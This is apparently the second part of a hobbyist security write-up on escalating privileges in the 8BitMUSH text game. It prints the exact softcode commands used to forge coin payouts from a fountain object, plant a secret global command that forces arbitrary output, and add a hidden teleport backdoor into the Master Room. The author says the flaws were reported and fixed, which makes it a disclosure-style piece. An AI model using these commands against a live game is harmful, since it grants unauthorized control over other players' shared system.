In Part One we discovered an object that lets us execute arbitrary commands via unsafe handling of user input - the Alley room. Now we want to understand the blast radius of this issue. The first question to ask is, "What does the Alley control?"
Alley(#9485RISVB) Type: Room Flags: TRUST STICKY VISUAL BATHROOM Owner: 8BitMUSH Zone: NOTHING Coins: 0 Created: Sat Apr 28 13:14:31 2001
The help entry for help control tells us that if the Alley has the TRUST flag, it controls anything with the same owner that isn't set WIZARD. As it turns out, the 8BitMUSH user owns a great deal of things throughout 8Bit.
Free Money
Let's start small and find an object owned by 8BitMUSH that handles coin transactions. The Fountain on the lawn in front of the Capitol Building is one such item. We can set it visual and have a look:
(Note: The Alley room was used to run some of the following commands, similar to the commands in Part One. I simplified these examples to just show the raw commands, but remember we wouldn't have the ability to perform these commands ourselves.)
> think set(#5260,VISUAL)
> ex #5260
A Fountain(#5260V)
Type: Thing Flags: VISUAL
Owner: 8BitMUSH Zone: *NOTHING* Coins: 1
Parent: *NOTHING*
Basic Lock: Connecting..
Functions: (Inherited from 8BitMUSH) #99 #256
Created: Mon Jan 28 23:54:06 2002
Last Modification: Mon Feb 15 20:13:27 2021
APAYMENT [#1000$]: &thrown me=[add(val(v(thrown)),inc(rand(%0)))];&total_thrown me=[add(val(v(total_thrown)),%0)][null(setq(C,switch(%0,1,penny,5,nickel,10,dime,25,quarter,coin)))];@emit The pond splash as %n's coin pierces the water.;@wait 4=@emit The water ripples violently towards to the edge of the pond, the %qC sinks to the bottom of the pool and lands..;@wait 9=@emit The ripples slow down, and finally, tiny air bubbles from the landing pop upon the top of the water. A few fish inspect the newly dropped object, then quickly return to darting about the water and picking at each other for food.
ATOUCH [#1000$]: give %#=[null(setq(V,val(v(thrown))))][null(set(me,thrown:0))]%qV
COST [#1000$]: 1 5 10 25
OPAYMENT [#1000$]: tosses a [switch(%0,1,penny,5,nickel,10,dime,quarter)] into the fountain.
PAYMENT [#1000$]: You toss in a [switch(%0,1,penny,5,nickel,10,dime,quarter)].
THROWN [#7841$]: 0
TOTAL_THROWN [#7841$]: 109
TOUCH [#1000$]: [switch(val(v(thrown)),1,You grab a penny.,0,{You fish around for a while, but don't find anything..},<3,You grab some coins from the bottom of the fountain.,You grab a handful of coins! You're rich!)]
The fountain operates by accepting thrown coins and then giving them to anyone that tries to touch it. Can we simply change the THROWN attribute to be given a number of coins that weren't actually thrown?
> think set(#5260,thrown:25) > touch fountain You grab a handful of coins! You're rich! A Fountain gives you 25 Coins.
It works! Let's throw back our ill-gotten gains and see what else we can find.
Tedium
Two easy methods worked to start finding interesting objects:
- Running
@chan/who <channel>on all the channels - Trying to
examinesome low-DBREF numbers
For each item not WIZARD owned by 8BitMUSH we can set it VISUAL and review the code. Here's one that has the Search and See_All powers that can be used for further exploring:
The Global Command Object(#1984VfScSoToTaFa) Type: Thing Flags: VISUAL FUNCTIONS Owner: 8BitMUSH Zone: *NOTHING* Coins: 1 Powers: Cemit Sql Pemit_All Search See_All Location: Master Room
Let's attach a new global command to it that only we can use:
> think set(#1984,C-+SNOWDAY:$+snowday *\:@swi/first \\\[strmatch(\\\%#\\,#30406)\\\]\\=0\\,\\{@pem/s \\\%#\\=Permission denied.\\}\\,\\{@force me=think pemit(\\\%#,\\\%0\\)})
> +snowday Hello \[name(\\%#)\]!
Hello TacoSal!
Modifying the Global Command Object takes a steady hand!
The Big Hurt
Using our new command, we can see that objects owned by 8BitMUSH that are not set WIZARD have the following powers:
> +snowday \[pemit(\\%#,sort(unique(iter(lsearch(8BitMUSH,flag,!W),powers(\%i))),,,\%r))\]
AnnounceCemitHolographicLong_FingersNo_PayPemit_AllQueue
SearchSee_AllSqlTport_AnythingTport_AnywhereUnkillable
That puts all of these powers at our disposal. Obligatory visit to the Master Room:
> think set(#5565,VISUAL)
> ex #5565
Strange Pipe(#5565IVe)
Type: Thing Flags: TRUST VISUAL ENTER_OK
Owner: 8BitMUSH Zone: *NOTHING* Coins: 1
Powers: Tport_Anything Tport_Anywhere
Location: Mario's Bathroom
> think set(#5565,CMD_WARP:$warp\:@swi/first \\\[strmatch(\\\%#\\,#30406%)\\\]\\=0\\,\\{@pem/s \\\%#\\=Permission denied.\\}\\,\\{@tel #30406=#2\\})
Now we just visit Mario's House at 30 Lakitu Blvd. and head upstairs:
> look Mario's Bathroom A room-length counter, with an equally long mirror above it, lines one wall of this large bathroom. Across the room from it is a shower stall. Light blue tiling covers the walls and floor, although you are not sure if the color was intended that way or has just faded into its current hue. You also see a large shower stall, a white porcelain sink, a wall cabinet with a mirror on it, and a toilet. Contents: Strange Pipe Obvious exits: Out > warp Master Room This is the master room. Any exit in here is considered global. The same is true to objects with $-commands placed here. The number of objects and exits in this room should be kept to a minimum.
Conclusion
In the span of a week we took a missing set of brackets and escalated into more powers than ROYALTY has. MUSH veterans probably have a better vision than I do for the potential outcomes. Chose your own adventure.
Hacking 8Bit is like beating your dad in basketball. It's a little sad when you win. The good news is that these issues have been turned over to staff and corrected prior to your reading this. Our security posture will be strong when the MUSH Wars renew and we feel the sting of battle once again.
What would you do as WIZARD for a day? I can say that seeing 8Bit from the top of Mount Slappy is better than anything you can see behind the curtain. My only regret before returning to a life of peasantry is not adding the BATHROOM flag to the Fountain. But as it turns out, this ability is jealously guarded, and no one but the wizards themselves may dictate who micturates in the fountains of ANSI City.
Update: If you're looking for the secret conclusion to this series, you can find Part Three here. The password is the one-word name of Burger King's signature sandwich.